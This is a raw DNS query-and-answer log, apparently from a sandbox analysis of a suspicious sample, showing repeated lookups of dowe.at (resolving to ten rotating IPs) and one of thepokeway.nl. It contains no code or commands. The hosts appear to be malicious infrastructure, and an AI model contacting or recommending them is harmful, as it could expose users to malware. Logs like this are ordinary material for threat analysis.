                                                            Nov 30, 2022 00:11:34.537358999 CET192.168.2.68.8.8.80xbebbStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:35.817455053 CET192.168.2.68.8.8.80xfe43Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:37.053144932 CET192.168.2.68.8.8.80x1dafStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:38.141012907 CET192.168.2.68.8.8.80x2ef3Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:39.139863968 CET192.168.2.68.8.8.80x266eStandard query (0)thepokeway.nlA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:40.692821026 CET192.168.2.68.8.8.80x46fStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:41.800481081 CET192.168.2.68.8.8.80x8504Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:42.937369108 CET192.168.2.68.8.8.80xb003Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:44.522392035 CET192.168.2.68.8.8.80xa796Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:45.507319927 CET192.168.2.68.8.8.80xbe7eStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:47.124767065 CET192.168.2.68.8.8.80xb0e8Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:48.973812103 CET192.168.2.68.8.8.80xacd6Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:50.177469969 CET192.168.2.68.8.8.80xa191Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:51.373785019 CET192.168.2.68.8.8.80x66ccStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:52.608006954 CET192.168.2.68.8.8.80xacbdStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:53.755806923 CET192.168.2.68.8.8.80x4a2bStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:55.344466925 CET192.168.2.68.8.8.80x293bStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:56.383055925 CET192.168.2.68.8.8.80x1e39Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:57.562014103 CET192.168.2.68.8.8.80x9fa9Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:59.303905010 CET192.168.2.68.8.8.80x8adStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:12:00.410181999 CET192.168.2.68.8.8.80xd88aStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:12:01.524296045 CET192.168.2.68.8.8.80xcd8fStandard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:12:03.480338097 CET192.168.2.68.8.8.80x37f4Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:12:05.245548010 CET192.168.2.68.8.8.80xc889Standard query (0)dowe.atA (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:12:07.934282064 CET192.168.2.68.8.8.80x9ea3Standard query (0)dowe.atA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:29.909164906 CET8.8.8.8192.168.2.60xf2fcNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:29.909164906 CET8.8.8.8192.168.2.60xf2fcNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:29.909164906 CET8.8.8.8192.168.2.60xf2fcNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:29.909164906 CET8.8.8.8192.168.2.60xf2fcNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:29.909164906 CET8.8.8.8192.168.2.60xf2fcNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:29.909164906 CET8.8.8.8192.168.2.60xf2fcNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:29.909164906 CET8.8.8.8192.168.2.60xf2fcNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:29.909164906 CET8.8.8.8192.168.2.60xf2fcNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:29.909164906 CET8.8.8.8192.168.2.60xf2fcNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:29.909164906 CET8.8.8.8192.168.2.60xf2fcNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:34.555744886 CET8.8.8.8192.168.2.60xbebbNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:34.555744886 CET8.8.8.8192.168.2.60xbebbNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:34.555744886 CET8.8.8.8192.168.2.60xbebbNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:34.555744886 CET8.8.8.8192.168.2.60xbebbNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:34.555744886 CET8.8.8.8192.168.2.60xbebbNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:34.555744886 CET8.8.8.8192.168.2.60xbebbNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:34.555744886 CET8.8.8.8192.168.2.60xbebbNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:34.555744886 CET8.8.8.8192.168.2.60xbebbNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:34.555744886 CET8.8.8.8192.168.2.60xbebbNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:34.555744886 CET8.8.8.8192.168.2.60xbebbNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:35.837424994 CET8.8.8.8192.168.2.60xfe43No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:37.070822954 CET8.8.8.8192.168.2.60x1dafNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:38.159097910 CET8.8.8.8192.168.2.60x2ef3No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:39.178725958 CET8.8.8.8192.168.2.60x266eNo error (0)thepokeway.nl5.135.247.111A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:40.713022947 CET8.8.8.8192.168.2.60x46fNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                                                            Nov 30, 2022 00:11:41.821110964 CET8.8.8.8192.168.2.60x8504No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
